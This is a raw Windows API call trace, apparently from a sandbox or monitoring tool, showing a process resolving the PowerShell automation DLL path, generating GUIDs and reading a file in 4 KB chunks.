	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd8a020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89f70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.596] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xed463bdc, Data2=0x760d, Data3=0x4428, Data4=([0]=0x87, [1]=0xe0, [2]=0xf9, [3]=0x85, [4]=0x45, [5]=0xa4, [6]=0x6f, [7]=0xa8))) returned 0x0
	[0121.596] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xd04dea04, Data2=0xcb3b, Data3=0x4725, Data4=([0]=0x89, [1]=0x2c, [2]=0x37, [3]=0xcc, [4]=0xcf, [5]=0x3e, [6]=0xd7, [7]=0x90))) returned 0x0
	[0121.597] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x9ed974a2, Data2=0x1552, Data3=0x4858, Data4=([0]=0x95, [1]=0x26, [2]=0xbb, [3]=0xa8, [4]=0x72, [5]=0xe6, [6]=0x21, [7]=0x81))) returned 0x0
	[0121.597] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xbe23f5b, Data2=0x5904, Data3=0x4c7b, Data4=([0]=0x87, [1]=0x3a, [2]=0x21, [3]=0x2f, [4]=0x11, [5]=0x8e, [6]=0xee, [7]=0xdb))) returned 0x0
	[0121.597] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x5396ae61, Data2=0xe86d, Data3=0x4d4f, Data4=([0]=0xa6, [1]=0xa3, [2]=0x9a, [3]=0x8a, [4]=0x96, [5]=0xeb, [6]=0xed, [7]=0xa0))) returned 0x0
	[0121.598] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x7522f74d, Data2=0x7a83, Data3=0x4a1d, Data4=([0]=0x99, [1]=0xde, [2]=0xd8, [3]=0x1, [4]=0x5e, [5]=0xa, [6]=0x8a, [7]=0x1e))) returned 0x0
	[0121.598] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x24714fd8, Data2=0xa612, Data3=0x44d5, Data4=([0]=0xab, [1]=0xc0, [2]=0x94, [3]=0xd0, [4]=0xac, [5]=0xc8, [6]=0x23, [7]=0x45))) returned 0x0
	[0121.598] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x120dc9fd, Data2=0x74c9, Data3=0x4fb5, Data4=([0]=0xbd, [1]=0x48, [2]=0x76, [3]=0x54, [4]=0x51, [5]=0x1d, [6]=0xb4, [7]=0x3d))) returned 0x0
	[0121.599] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xafd1546f, Data2=0xdffd, Data3=0x42af, Data4=([0]=0xbc, [1]=0xce, [2]=0x47, [3]=0x84, [4]=0x10, [5]=0x65, [6]=0x28, [7]=0xb))) returned 0x0
	[0121.600] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x1454e62a, Data2=0x9b6e, Data3=0x4d26, Data4=([0]=0xb4, [1]=0xd6, [2]=0x65, [3]=0x6b, [4]=0x43, [5]=0x44, [6]=0xe1, [7]=0xd9))) returned 0x0
	[0121.601] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xade90507, Data2=0xd276, Data3=0x48a3, Data4=([0]=0x95, [1]=0x11, [2]=0x7c, [3]=0x1e, [4]=0x83, [5]=0x8, [6]=0x2f, [7]=0x85))) returned 0x0
	[0121.602] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x245ee820, Data2=0x3f39, Data3=0x4953, Data4=([0]=0xaf, [1]=0x67, [2]=0xf, [3]=0x98, [4]=0xcd, [5]=0x99, [6]=0x7d, [7]=0x8b))) returned 0x0
	[0121.602] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xaa9fd75f, Data2=0x874f, Data3=0x4856, Data4=([0]=0x81, [1]=0xa1, [2]=0x9, [3]=0x77, [4]=0xe1, [5]=0xc0, [6]=0x23, [7]=0xf9))) returned 0x0
	[0121.602] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xfe670d83, Data2=0x3ead, Data3=0x4ad6, Data4=([0]=0x92, [1]=0xd3, [2]=0xe7, [3]=0x90, [4]=0x77, [5]=0xc4, [6]=0xe, [7]=0xd4))) returned 0x0
	[0121.603] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x4db3a6e4, Data2=0x25e5, Data3=0x4319, Data4=([0]=0x84, [1]=0x72, [2]=0xaf, [3]=0x5b, [4]=0x69, [5]=0xa8, [6]=0x22, [7]=0x6d))) returned 0x0
	[0121.603] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xe3a070ee, Data2=0x9bc1, Data3=0x4cb1, Data4=([0]=0xae, [1]=0x88, [2]=0xe9, [3]=0xe9, [4]=0xf1, [5]=0x42, [6]=0xb4, [7]=0x27))) returned 0x0
	[0121.604] VirtualQuery (in: lpAddress=0xedd89300, lpBuffer=0xd7edd8a1c0, dwLength=0x30 | out: lpBuffer=0xd7edd8a1c0*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.604] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x7fe67f9c, Data2=0x6bfb, Data3=0x446f, Data4=([0]=0xb5, [1]=0x52, [2]=0x38, [3]=0xe5, [4]=0xa1, [5]=0xe8, [6]=0xfe, [7]=0xe8))) returned 0x0
	[0121.604] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x63b57120, Data2=0xc62e, Data3=0x437c, Data4=([0]=0xa8, [1]=0xe5, [2]=0x20, [3]=0xcb, [4]=0xdc, [5]=0xee, [6]=0x9d, [7]=0xb6))) returned 0x0
	[0121.607] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.607] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.607] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.607] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.608] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.608] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.608] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.608] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.608] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.608] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.608] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.609] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.610] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.610] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.610] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.610] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.610] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.610] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.610] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.610] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.610] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.611] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.611] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.611] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.611] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.611] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.611] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.611] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.612] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.612] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.612] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.613] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.613] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.613] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.613] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.613] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.613] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.613] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.613] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.613] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.614] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.614] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.614] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.614] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.614] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.614] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.614] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x684, lpOverlapped=0x0) returned 1
	[0121.614] ReadFile (in: hFile=0x694, lpBuffer=0x2ad240734c4, nNumberOfBytesToRead=0x17c, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad240734c4*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x0, lpOverlapped=0x0) returned 1
	[0121.614] ReadFile (in: hFile=0x694, lpBuffer=0x2ad24073ed8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad24073ed8*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x0, lpOverlapped=0x0) returned 1
	[0121.619] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x64c7a87f, Data2=0x3d1e, Data3=0x44e5, Data4=([0]=0x90, [1]=0x27, [2]=0xff, [3]=0xbe, [4]=0x89, [5]=0x69, [6]=0xb2, [7]=0x4c))) returned 0x0
	[0121.620] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x5874af92, Data2=0xaa63, Data3=0x41f1, Data4=([0]=0x8e, [1]=0xc7, [2]=0xcf, [3]=0xa4, [4]=0xe9, [5]=0xe8, [6]=0x1d, [7]=0xb4))) returned 0x0
